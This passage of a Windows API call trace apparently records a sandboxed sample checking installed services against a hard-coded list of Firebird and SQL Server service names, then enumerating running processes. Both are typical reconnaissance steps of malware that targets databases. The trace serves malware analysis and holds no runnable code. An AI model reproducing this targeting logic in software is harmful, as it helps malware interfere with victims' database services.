lstrlenW (lpString="EventSystem") returned 11 [0052.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0052.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0052.174] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0052.174] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0052.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0052.174] lstrlenW (lpString="FontCache") returned 9 [0052.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0052.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0052.174] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0052.175] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0052.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0052.175] lstrlenW (lpString="gpsvc") returned 5 [0052.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0052.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0052.175] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0052.175] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0052.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0052.175] lstrlenW (lpString="iphlpsvc") returned 8 [0052.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.175] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0052.175] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0052.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0052.175] lstrlenW (lpString="KeyIso") returned 6 [0052.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0052.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0052.175] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0052.175] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0052.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0052.175] lstrlenW (lpString="LanmanServer") returned 12 [0052.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0052.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0052.175] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0052.175] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0052.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0052.175] lstrlenW (lpString="LanmanWorkstation") returned 17 [0052.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.175] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0052.175] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0052.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0052.175] lstrlenW (lpString="lfsvc") returned 5 [0052.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0052.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0052.175] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0052.176] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0052.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0052.176] lstrlenW (lpString="lmhosts") returned 7 [0052.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0052.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0052.176] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0052.176] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0052.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0052.176] lstrlenW (lpString="LSM") returned 3 [0052.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0052.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0052.176] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0052.176] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0052.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0052.176] lstrlenW (lpString="MpsSvc") returned 6 [0052.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0052.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0052.176] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0052.176] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0052.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0052.176] lstrlenW (lpString="NcbService") returned 10 [0052.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0052.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0052.176] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0052.176] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0052.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0052.176] lstrlenW (lpString="netprofm") returned 8 [0052.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0052.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0052.176] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0052.176] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0052.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0052.176] lstrlenW (lpString="NlaSvc") returned 6 [0052.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0052.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0052.177] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0052.177] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0052.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0052.177] lstrlenW (lpString="nsi") returned 3 [0052.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0052.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0052.177] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0052.177] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0052.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0052.177] lstrlenW (lpString="PcaSvc") returned 6 [0052.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0052.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0052.177] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0052.177] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0052.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0052.177] lstrlenW (lpString="PlugPlay") returned 8 [0052.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0052.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0052.177] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0052.177] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0052.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0052.177] lstrlenW (lpString="Power") returned 5 [0052.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0052.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0052.177] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0052.177] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0052.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0052.177] lstrlenW (lpString="ProfSvc") returned 7 [0052.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0052.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0052.177] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0052.177] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0052.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0052.177] lstrlenW (lpString="RpcEptMapper") returned 12 [0052.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.178] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0052.178] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0052.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0052.178] lstrlenW (lpString="RpcSs") returned 5 [0052.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0052.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0052.178] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0052.178] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0052.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0052.178] lstrlenW (lpString="SamSs") returned 5 [0052.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0052.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0052.178] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0052.178] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0052.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0052.178] lstrlenW (lpString="Schedule") returned 8 [0052.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0052.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0052.178] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0052.178] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0052.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0052.178] lstrlenW (lpString="SecurityHealthService") returned 21 [0052.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0052.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0052.178] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0052.178] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0052.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0052.178] lstrlenW (lpString="SENS") returned 4 [0052.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0052.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0052.178] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0052.178] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0052.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0052.178] lstrlenW (lpString="ShellHWDetection") returned 16 [0052.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.179] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0052.179] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0052.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0052.179] lstrlenW (lpString="Spooler") returned 7 [0052.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0052.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0052.179] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0052.179] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0052.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0052.179] lstrlenW (lpString="SSDPSRV") returned 7 [0052.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0052.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0052.179] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0052.179] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0052.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0052.179] lstrlenW (lpString="StateRepository") returned 15 [0052.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0052.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0052.179] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0052.179] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0052.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0052.179] lstrlenW (lpString="SysMain") returned 7 [0052.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0052.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0052.179] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0052.179] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0052.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0052.179] lstrlenW (lpString="SystemEventsBroker") returned 18 [0052.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0052.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0052.179] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0052.179] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0052.180] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x636198 | out: hHeap=0x5d0000) returned 1 [0052.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0052.184] Process32FirstW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0052.184] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0052.185] lstrlenW (lpString="System") returned 6 [0052.185] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0052.186] lstrlenW (lpString="smss.exe") returned 8 [0052.186] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.187] lstrlenW (lpString="csrss.exe") returned 9 [0052.187] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0052.187] lstrlenW (lpString="wininit.exe") returned 11 [0052.187] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.188] lstrlenW (lpString="csrss.exe") returned 9 [0052.188] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0052.189] lstrlenW (lpString="winlogon.exe") returned 12 [0052.189] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0052.190] lstrlenW (lpString="services.exe") returned 12 [0052.190] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0052.191] lstrlenW (lpString="lsass.exe") returned 9 [0052.191] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.191] lstrlenW (lpString="svchost.exe") returned 11 [0052.192] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0052.192] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0052.192] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0052.193] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0052.193] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.194] lstrlenW (lpString="svchost.exe") returned 11 [0052.194] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0052.195] lstrlenW (lpString="dwm.exe") returned 7 [0052.195] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.195] lstrlenW (lpString="svchost.exe") returned 11 [0052.195] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.196] lstrlenW (lpString="svchost.exe") returned 11 [0052.196] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.197] lstrlenW (lpString="svchost.exe") returned 11 [0052.197] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.197] lstrlenW (lpString="svchost.exe") returned 11 [0052.197] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.198] lstrlenW (lpString="svchost.exe") returned 11 [0052.198] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.199] lstrlenW (lpString="svchost.exe") returned 11 [0052.199] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.199] lstrlenW (lpString="svchost.exe") returned 11 [0052.199] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.200] lstrlenW (lpString="svchost.exe") returned 11 [0052.200] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.201] lstrlenW (lpString="svchost.exe") returned 11 [0052.201] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0052.202] lstrlenW (lpString="spoolsv.exe") returned 11 [0052.202] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.202] lstrlenW (lpString="svchost.exe") returned 11 [0052.203] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.203] lstrlenW (lpString="svchost.exe") returned 11 [0052.203] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0052.204] lstrlenW (lpString="audiodg.exe") returned 11 [0052.204] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0052.205] lstrlenW (lpString="sihost.exe") returned 10 [0052.205] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.205] lstrlenW (lpString="svchost.exe") returned 11 [0052.206] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0052.206] lstrlenW (lpString="taskhostw.exe") returned 13 [0052.206] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0052.207] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0052.207] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0052.207] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0052.208] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, 